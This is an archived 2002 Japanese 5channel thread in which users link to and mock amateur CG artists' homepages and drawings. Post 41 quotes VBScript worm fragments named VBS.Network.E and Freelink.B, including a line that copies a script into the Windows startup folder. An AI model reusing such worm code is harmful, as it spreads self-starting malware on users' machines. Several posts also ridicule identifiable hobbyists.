5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【ヘタレ】CG上達への道【キリ番】

1 :名無しさん@ゴーゴーゴーゴー!:02/06/29 16:44 ID:++zbvjHE
以下の条件に当て嵌まるCG描きを、マターリヲチしませう。
手出し厳禁、上達までを生温かく見守るスレです。

1.キリ番を設定しているものの、踏み逃げが多い。
2.掲示板に感想の書き込みが全然ない。
3.キリ番踏み逃げやめよう同盟に参加している。
関連HP
ttp://isweb37.infoseek.co.jp/play/crawd-/humi.html
4.同じく絶対反対同盟に参加している。
関連HP
ttp://www20.tok2.com/home/naruto/han/top.htm
5.CGに見えないCGを置いている。
6.どんなキャラクターを描いても同じ顔になっている(彩色は違う)
7.右斜め45°のバストアップ絵しかありません。
8.しかし掲示板のアイコンは意地になっているのか自分の絵を使っている。
9.お約束のように「毒吐き」等ネットマナーのバナーを貼っている。
10.これでフォトショップなんでつか?という絵しかない。
11.画像がやたら重い。
そんな彼等が上達出来るといいなあ、というスレです。
自分のHPを晒すのもありかも。
荒らしは し な い で ねd(・∀・)
関連事項
ググルにて「キリ番 踏み逃げ 同盟」の検索結果
http://www.google.com/search?hl=ja&q=%83L%83%8A%94%D4+%93%A5%82%DD%93%A6%82%B0+%93%AF%96%BF&lr=lang_ja
「踏み逃げやめようっ!」同盟参加者一覧
http://isweb37.infoseek.co.jp/play/crawd-/humimenber.html

2 :名無しさん@ゴーゴーゴーゴー!:02/06/29 16:45 ID:SVImO3YK
           -‐-      ,、
       __〃      ヽ lv !
       ヽ\ .ノノノ)ヘ))〉ヽ'   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
     _!(0.)! (┃┃〈リ /   < はわわー。 2げっとです〜
   /\ Vレリ、" lフ/ ./ \   \___________
  /  ./l ̄ ̄ ̄ ̄ ̄ ̄ ̄|ヽ
  \/l  |―――――――! ヽ          (´
      l  | ☆ マルチ専用 |       (´´
      l  l―――――――|       (´⌒(´
.      \l_______|≡≡≡(´⌒;;;≡≡≡=☆
                 (´⌒(´⌒;;  ズザザーーーーーーーーッ
あ〜ヒマ・・・

3 :名無しさん@ゴーゴーゴーゴー!:02/06/29 16:49 ID:9H9Lp8NB
いきなり厨が釣れた(w
しかしあまりウレスィくない。

4 :名無しさん@ゴーゴーゴーゴー!:02/06/29 20:39 ID:ZdZ180kN
良スレになるといいな

5 :名無しさん@ゴーゴーゴーゴー!:02/06/29 20:40 ID:ZdZ180kN
sage忘れ・・・。

6 :名無しさん@ゴーゴーゴーゴー!:02/06/29 21:41 ID:us6hxx6F
ちょと条件が厳しいと思うが・・・

7 :名無しさん@ゴーゴーゴーゴー!:02/06/30 00:22 ID:LLleXX72
ヘタレCGスレとは違うの?

8 :名無しさん@ゴーゴーゴーゴー!:02/07/03 19:41 ID:oISnmwB+
sage

9 :Name_Not_Found:02/07/04 22:41 ID:fDBas7Ad
そういえばヘタレCGスレってどこいった?

10 :名無しさん@ゴーゴーゴーゴー!:02/07/06 09:13 ID:qcmdcMGD
>>9
「ちょっとヘタすぎやしないかそのCGは」のスレは
大分前に途切れたまま続編がありませんね

11 :名無しさん@ゴーゴーゴーゴー!:02/07/06 12:38 ID:QOOBSE7H
DAT落ちしちゃったのかな>ヘタレCGスレ
だれかアドレス分かる人いない?
ヘタレ絵みた後に上手な絵を見ると、不思議と絵を描きたくなるんだよね

12 :名無しさん@ゴーゴーゴーゴー!:02/07/06 13:07 ID:QOOBSE7H
Googleで検索したら簡単に見つかっちった

13 :名無しさん@名前ないニダ!:02/07/07 08:54 ID:GVZJ5RsR
踊り子さんには手を触れないでくだちい。
http://easter.ne.jp/misaltuti/top.html
まだまだのレベルだが、今後皿に酷くなってくれるのだろうか。

14 :名無しさん@ゴーゴーゴーゴー!:02/07/07 12:03 ID:hL4Shc6K
>>13
ttp://easter.ne.jp/misaltuti/41.png

『家に、スキャナがあったことを知ってPCで描いた絵じゃないから

ちょっとはィィかな〜と思って・・。』

タブレットじゃ無いのか・・・?
でも自覚症状はあるみたいだから・・・なんとか・・なる・か・な

15 :名無しさん@ゴーゴーゴーゴー!:02/07/07 17:39 ID:OQpgxgCe
>>1

「ヘタレ」スレにもあったけど、

リア厨やリア消の絵を晒さない。

これを加えてくれ。お約束のわからないバカが夏厨と一緒にやってくる
季節だからね。

16 :名無しさん@名前ないニダ!:02/07/07 19:56 ID:PrEr+oWN
>15
仕方ない、無断転載になるがうpろだ設置するか?
アダルト・炉厳禁ヘタレ絵のみで。

17 :名無しさん@ゴーゴーゴーゴー!:02/07/07 23:31 ID:GKez8uF3
>>16
偶然そこに迷い込んだ奴の反応が面白そうだw


18 :名無しさん@ないニダ! ◆KDIsPEFA :02/07/08 00:42 ID:RzivviMw
んでは設置してみるが、垢取得まで待っていてクレ。
つか。
どれ設置したら良かろうな?
C-BOARD
http://www.skullysoft.com/soft/ssc-board/index.shtml
BBS NOTE
http://wondercatstudio.com/
アルバム掲示板
http://www2j.biglobe.ne.jp/~apollo/download/index.html
スマソ、これ以外のうpろだ知らんの…
いいのあったら教えてくれ。

19 :名無しさん@ゴーゴーゴーゴー!:02/07/08 15:16 ID:Ykw24/xd
ttp://www5b.biglobe.ne.jp/~kokuyume/777P8.htm
とりあえずスレの活性化を願って



20 :名無しさん@ゴーゴーゴーゴー!:02/07/09 11:02 ID:RcOp2rLg
>>19
汚いがヘタレではないかと

TBOARD 002
http://sk.redbit.ne.jp/~tboard/tboard002/tboard002.cgi

21 :名無しさん@ゴーゴーゴーゴー!:02/07/09 15:54 ID:+2FOEFSY
AVALON7先生はとうとうCG集のみならずゲームを作っちまいますたよ。
ttp://www.dlsite.com/data/cg/gs0246.html
バボーン!!! マジかよ!!!!

22 :名無しさん@ゴーゴーゴーゴー!:02/07/09 22:26 ID:RtsbXKmJ
ttp://www.interq.or.jp/ruby/yuj/index.htm
お仕事募集中だそうです

23 :名無しさん@名前ないニダ!! ◆hPuKftTY :02/07/10 19:09 ID:jCtNxaEB
>20
その板設置すれって事?
それとも使えって事?

24 :名無しさん@名前ないニダ!! ◆hPuKftTY :02/07/10 19:12 ID:jCtNxaEB
スマソ。
設置すれって意味だったな;
ちょいと垢取ってくるわ。


25 :名無しさん@ゴーゴーゴーゴー!:02/07/10 23:37 ID:p0KTvZV+
漏れ、ヘタレCG描いてる。見る?

26 :名無しさん@名前ないニダ!! ◆hPuKftTY :02/07/11 07:40 ID:6mCrpCTf
>25
うpろだ設置したら投稿してくれ。

27 :25:02/07/12 12:07 ID:w/yjCZlh
うpした。
ttp://kari.to/upload/source/1243.jpg

28 :名無しさん@ゴーゴーゴーゴー!:02/07/12 14:29 ID:2iuY8Gaa
>>27
カワ(゚∀゚)イイ!



じゃないか

29 :名無しさん@名前ないニダ!! ◆hPuKftTY :02/07/12 18:17 ID:qNeV1a6l
虫キタ━(゚∀゚)━( ゚∀)━(  ゚)━(  )━(  )━(゚  )━(∀゚ )━(゚∀゚)━!!!!!

スマソ、漏れ虫苦手なのん…

30 :25:02/07/12 23:33 ID:w/yjCZlh
すまそ。

31 :名無しさん@名前ないニダ!! ◆hPuKftTY :02/07/13 17:57 ID:ZQrl91HP
>30
こちらこそスマソ。
ヘタレじゃないと思うんだけど、虫見ると逃げ出すのが
習性になりますた。

32 :名無しさん@ゴーゴーゴーゴー!:02/07/13 20:46 ID:FtyC2U5W
ttp://www9.ocn.ne.jp/~tdalos/
イラストが全部右斜め45°のバストアップ

ttp://www5e.biglobe.ne.jp/~nayunayu/
製作途中らしいがヘタレ

33 :名無しさん@名前ないニダ!! ◆hPuKftTY :02/07/13 21:04 ID:ZQrl91HP
キリ番踏み逃げすると泣くそうな。
http://www.geocities.co.jp/AnimeComic-Pen/6775/index.htm
解析ないので直貼り

34 :名無しさん@ゴーゴーゴーゴー!:02/07/13 21:15 ID:/Io4sfiV
>>32
下のヘタレのやつ
締め切りも何もないのに
>時間が無くて色が塗れませんでした。
ってどういうことなんだろうか。


35 :名無しさん@ゴーゴーゴーゴー!:02/07/13 21:32 ID:3resXX+v
>>33
お絵描き掲示板、管理人の絵が一番…(以下略
全身描かなきゃそんなでもないんだけどなぁ。

解析なくても直リンはヤメレ
2ちゃねらに踏み逃げされたら泣いちゃう(w

36 :名無しさん@ゴーゴーゴーゴー!:02/07/13 23:32 ID:YR1FWTTw
>>33
何かイイ!見守りタイとおもたYO
今後の作品に注目だな。上手くなるように祈りまそ

37 :名無しさん@ゴーゴーゴーゴー!:02/07/13 23:49 ID:FmAIF5E+
ttp://homepage1.nifty.com/800tours/cg/room1/index1.htm

ヘタレスレないみたいなんで、ここにさらしときますw
3年近くほとんど上達してません^_^;

38 :名無しさん@ゴーゴーゴーゴー!:02/07/14 04:55 ID:wBHLbp9O
昔あったヘタすぎCGを晒すスレはもうないの?
好きだったのにな…

39 :名無しさん@名前ないニダ!! ◆hPuKftTY :02/07/14 09:52 ID:fcoi4KUz
直貼り反省中。
上手くなりそうなヤシぽ。
ttp://easter.ne.jp/miki2/zakuzaku.htm
他スレから拾ってきた。

40 :名無しさん@ゴーゴーゴーゴー!:02/07/14 11:38 ID:DhZ/+EwI
>>15
漏れとしてはリア高も可哀相なのだが。

41 :名無しさん@ゴーゴーゴーゴー!:02/07/14 18:35 ID:om+i80/K
VBS.Network.E
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
VBSInternal
cIf s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
VBS Freelink.B

42 :名無しさん@ゴーゴーゴーゴー!:02/07/14 19:03 ID:way/tYGn
>>39
・・・いや、どうなんだろう。時間かかりそうだね。
絵より掲示板の
「最近Cドライブ初期化したので色々吹っ飛んでます。多分ハッカーかウイルスにやられたと思う」
にちょっとワラタ。ハッカーて。

43 :名無しさん@ゴーゴーゴーゴー!:02/07/14 19:58 ID:m/i2nupw
ちょっと下手すぎじゃないかそのCGはスレ、誰かたて直さない?

44 : :02/07/14 20:04 ID:EMmcAxsb
>>43
もうだいぶネタ出尽くしちゃったから沈んだんでしょ?
あの殿堂入り級のモノはそうそうないよ。

45 :名無しさん@ゴーゴーゴーゴー!:02/07/14 23:43 ID:RCjipAUp
>>43
漏れもキボ〜ン

46 :名無しさん@ゴーゴーゴーゴー!:02/07/15 00:46 ID:+GIS1LL1
>>44
いや、ネットの世界は日進月歩。
新しい伝説が生まれているはずだし

47 :名無しさん@ゴーゴーゴーゴー!:02/07/15 03:51 ID:58kMJMmM
確かに新たに神となりうる資質をもった者がネットにぞくぞくと参入してますからな


48 :名無しさん@ゴーゴーゴーゴー!:02/07/15 09:57 ID:/i4a2+ui
昔描いた絵なんですが、時間がなくて上手く似せられませんでした。
ttp://www1.ocn.ne.jp/~tryart/ms-john/ms_undou.JPG

49 :名無しさん@ゴーゴーゴーゴー!:02/07/15 12:40 ID:3afQeZiD
48>>
ネ申 !

50 :名無しさん@ゴーゴーゴーゴー!:02/07/15 23:12 ID:QDf+cIxg
>>48
っつーか 大 運 会 ?

51 :名無しさん@ゴーゴーゴーゴー!:02/07/16 04:16 ID:OlT8ek+Q
ttp://www.ipc-tokai.or.jp/~tamaki-s/

52 :48:02/07/16 10:34 ID:G+QTfC8t
CGを描く際に描いた設定画です。
ttp://www1.ocn.ne.jp/~tryart/ms-john/ms_morri.JPG

53 :名無しさん@ゴーゴーゴーゴー!:02/07/16 13:40 ID:yUxMiGu5
>52
ワロタ
折れもヒトツ。リスカ写真で検索してたら見つけたとこ
ヘタすぎスレがあればそっちに貼ったんだけど…
ttp://www.h2.dion.ne.jp/~mayu27/

54 :48:02/07/16 13:47 ID:Ti+wNvZs
一応言っておくけど、漏れの絵はネタですから。

55 :名無しさん@ゴーゴーゴーゴー!:02/07/16 13:59 ID:1HFkU2pG
ヘタレキタ━(゚∀゚)━( ゚∀)━( ゚)━( )━( )━(゚ )━(∀゚ )━(゚∀゚)━!!!!!
ttp://isweb42.infoseek.co.jp/play/siguma0/

56 :25です:02/07/16 22:56 ID:iedxwsel
やっぱ漏れヘタレだーぁYo
次の作品、楽しみにしててね

57 :名無しさん@ゴーゴーゴーゴー!:02/07/16 23:24 ID:q2xzvqUY
やっぱへたスレ立てようよ。ちなみに俺は試したが立て杉といわれた。

58 :名無しさん@ゴーゴーゴーゴー!:02/07/16 23:45 ID:bhxX10Mv
マルチ宣伝厨の実体。
http://www.geocities.co.jp/HeartLand-Yurinoki/5786//gallery.html
ヘタレ…
ちなみにどんなマルチダタかというと…
http://kaba.2ch.net/test/read.cgi/net/1025257421/93

59 :名無しさん@ゴーゴーゴーゴー!:02/07/17 00:39 ID:NkbahJl/
ヘタレハケーン!
IRASTじゃなくてILLUSTだろうと小一時間(以下略)
ttp://page.freett.com/mzt/seint.htm
思わず後ろの百太郎かとオモタYO!
http://page.freett.com/mzt/ohirune.jpg

60 :名無しさん@ゴーゴーゴーゴー!:02/07/17 00:40 ID:59O5IkR+
SEINTじゃなくてsaintだよぅ……

61 :名無しさん@ゴーゴーゴーゴー!:02/07/17 00:52 ID:tHQ/NZo7
>>59のサイトの絵って俺より上手いな。
俺のサイトもそろそろここに晒されるのか?(^_^;)

62 :名無しさん@ゴーゴーゴーゴー!:02/07/17 02:21 ID:sZHhQPva
>>59
手がゴツいんですけど

63 :名無しさん@ゴーゴーゴーゴー!:02/07/17 10:09 ID:/G48+Uuk
ヘタレCGスレたてちゃった。

http://kaba.2ch.net/test/read.cgi/net/1026867835/

64 :名無しさん@ゴーゴーゴーゴー!:02/07/17 18:36 ID:J9JhsfuW
>63
このスレ沈むか?

65 :名無しさん@ゴーゴーゴーゴー!:02/07/18 09:57 ID:rp5gcfib
>>59
可愛いじゃん。

13 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)